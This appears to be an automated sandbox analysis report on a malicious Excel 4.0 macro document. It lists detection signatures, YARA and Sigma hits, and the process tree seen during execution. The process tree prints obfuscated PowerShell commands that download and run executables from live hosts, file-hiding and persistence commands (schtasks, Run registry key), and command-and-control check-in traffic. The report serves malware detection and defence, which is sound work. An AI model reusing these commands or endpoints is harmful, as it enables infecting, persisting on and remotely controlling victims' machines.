Play interactive tour

Edit tour

Analysis Report 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

Overview

General Information

Sample Name:	1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls
Analysis ID:	335896
MD5:	4468e0175c68f3751fc2027f1e42ca0c
SHA1:	c19aff367853c61d750b2da47623b69d8c1b42bb
SHA256:	4054344f07e1877b2cbb1a13c9bee260f0ae1f41c713374ccb9b130e3bae19a6
Tags:	SilentBuilderxls
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

.NET source code contains potential unpacker

Document exploit detected (process start blacklist hit)

Drops PE files with benign system names

Found C&C like URL pattern

Found Excel 4.0 Macro with suspicious formulas

Found obfuscated Excel 4.0 Macro

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Obfuscated command line found

Powershell drops PE file

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Suspicious Svchost Process

Sigma detected: System File Execution Location Anomaly

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to download and execute files (via powershell)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Obfuscated Powershell

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains embedded VBA macros

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 944 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

cmd.exe (PID: 2560 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 2312 cmdline: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 2556 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 2800 cmdline: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 1976 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 2880 cmdline: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 852D67A27E454BD389FA7F02A8CBE23F)

attrib.exe (PID: 2972 cmdline: 'C:\Windows\system32\attrib.exe' +s +h pd.bat MD5: C65C20C89A255517F11DD18B056CADB5)

cmd.exe (PID: 2344 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 960 cmdline: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 1688 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

mode.com (PID: 3012 cmdline: mode 18,1 MD5: 718E86CB060170430D4EF70EE39F93D4)

cmd.exe (PID: 1544 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

cmd.exe (PID: 620 cmdline: Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 2264 cmdline: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe; MD5: 852D67A27E454BD389FA7F02A8CBE23F)

ps.exe (PID: 2364 cmdline: 'C:\Users\user\AppData\Local\Temp\ps.exe' MD5: 128409D5CB9701CD12600BAF7A623794)

schtasks.exe (PID: 2940 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

ps.exe (PID: 2932 cmdline: C:\Users\user\AppData\Local\Temp\ps.exe MD5: 128409D5CB9701CD12600BAF7A623794)

cmd.exe (PID: 1840 cmdline: 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe MD5: AD7B9C14083B52BC532FBA5948342B98)

reg.exe (PID: 3016 cmdline: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe MD5: D69A9ABBB0D795F21995C2F48C1EB560)

svchost.exe (PID: 2528 cmdline: 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 128409D5CB9701CD12600BAF7A623794)

schtasks.exe (PID: 3052 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

svchost.exe (PID: 2184 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 128409D5CB9701CD12600BAF7A623794)

svchost.exe (PID: 2464 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 128409D5CB9701CD12600BAF7A623794)

cmd.exe (PID: 2804 cmdline: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 2448 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat') MD5: 852D67A27E454BD389FA7F02A8CBE23F)

svchost.exe (PID: 2856 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)

svchost.exe (PID: 2800 cmdline: 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 128409D5CB9701CD12600BAF7A623794)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x279c2:$s1: Excel 0x2416c:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x124eb:$r1: p^owersh^el^l 0x12719:$r1: p^owersh^el^l 0x1298b:$r1: p^owersh^el^l 0x12b6d:$r1: p^owersh^el^l 0x124eb:$r2: p^owersh^el^l 0x12719:$r2: p^owersh^el^l 0x1298b:$r2: p^owersh^el^l 0x12b6d:$r2: p^owersh^el^l
dump.pcap	JoeSecurity_ObfuscatedPowershell	Yara detected Obfuscated Powershell	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Documents\pd.bat	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0xd4:$r1: p^owersh^el^l 0x302:$r1: p^owersh^el^l 0x52e:$r1: p^owersh^el^l 0x710:$r1: p^owersh^el^l 0xd4:$r2: p^owersh^el^l 0x302:$r2: p^owersh^el^l 0x52e:$r2: p^owersh^el^l 0x710:$r2: p^owersh^el^l
C:\Users\user\Documents\pd.bat	JoeSecurity_ObfuscatedPowershell	Yara detected Obfuscated Powershell	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000020.00000002.2179906707.0000000002601000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000018.00000002.2157884372.0000000002671000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000027.00000002.2192856956.0000000002661000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x1aae2:$r1: p^owersh^el^l 0x1ad10:$r1: p^owersh^el^l 0x1af3c:$r1: p^owersh^el^l 0x1b11e:$r1: p^owersh^el^l 0x1d18c:$r1: p^owersh^el^l 0x1d3ba:$r1: p^owersh^el^l 0x1d5e6:$r1: p^owersh^el^l 0x1d7c8:$r1: p^owersh^el^l 0x1da64:$r1: p^owersh^el^l 0x1dc92:$r1: p^owersh^el^l 0x1debe:$r1: p^owersh^el^l 0x1e0a0:$r1: p^owersh^el^l 0x1aae2:$r2: p^owersh^el^l 0x1ad10:$r2: p^owersh^el^l 0x1af3c:$r2: p^owersh^el^l 0x1b11e:$r2: p^owersh^el^l 0x1d18c:$r2: p^owersh^el^l 0x1d3ba:$r2: p^owersh^el^l 0x1d5e6:$r2: p^owersh^el^l 0x1d7c8:$r2: p^owersh^el^l 0x1da64:$r2: p^owersh^el^l

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\ps.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\ps.exe, ParentProcessId: 2364, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp', ProcessId: 2940

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 944, ProcessCommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', ProcessId: 2560

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\user\AppData\Roaming\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Roaming\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\ps.exe, ParentImage: C:\Users\user\AppData\Local\Temp\ps.exe, ParentProcessId: 2932, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\svchost.exe' , ProcessId: 2528

Sigma detected: System File Execution Location Anomaly

Show sources

Source: Process started

Author: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Users\user\AppData\Roaming\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Roaming\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\ps.exe, ParentImage: C:\Users\user\AppData\Local\Temp\ps.exe, ParentProcessId: 2932, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\svchost.exe' , ProcessId: 2528

Sigma detected: Hiding Files with Attrib.exe

Show sources

Source: Process started

Author: Sami Ruohonen: Data: Command: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine|base64offset|contains: , Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2880, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, ProcessId: 2972

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: 'C:\Users\user\AppData\Roaming\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Roaming\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\ps.exe, ParentImage: C:\Users\user\AppData\Local\Temp\ps.exe, ParentProcessId: 2932, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\svchost.exe' , ProcessId: 2528

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\svchost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Joe Sandbox ML: detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then sub esp, 2Ch
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push esi
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 00491728h
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov edx, dword ptr [ecx+08h]
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push edi
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then sub esp, 1Ch
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 00491AB0h
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push edi
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then sub esp, 1Ch
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 00492088h
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov eax, dword ptr [ecx]
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 00492108h
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov eax, dword ptr [0048E55Ch]
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push edi
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push esi
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 004921A0h
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h

Source: global traffic

DNS query: name: cutt.ly

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2022985 ET TROJAN Trojan Generic - POST To gate.php with no accept headers 192.168.2.22:49171 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49171 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2026071 ET TROJAN W32.FakeEzQ.kr Checkin 192.168.2.22:49171 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2022985 ET TROJAN Trojan Generic - POST To gate.php with no accept headers 192.168.2.22:49172 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49172 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2026071 ET TROJAN W32.FakeEzQ.kr Checkin 192.168.2.22:49172 -> 172.67.167.122:80

Found C&C like URL pattern

Show sources

Source: global traffic	HTTP traffic detected: POST /cc/gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: http genericHost: cryptodual.netContent-Length: 87Cache-Control: no-cacheData Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional
Source: global traffic	HTTP traffic detected: POST /cc/gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: http genericHost: cryptodual.netContent-Length: 87Cache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161Data Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional

Source: global traffic

HTTP traffic detected: GET /bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 172.67.8.238 172.67.8.238
Source: Joe Sandbox View	IP Address: 37.46.150.139 37.46.150.139

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139

Source: global traffic	HTTP traffic detected: GET /bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
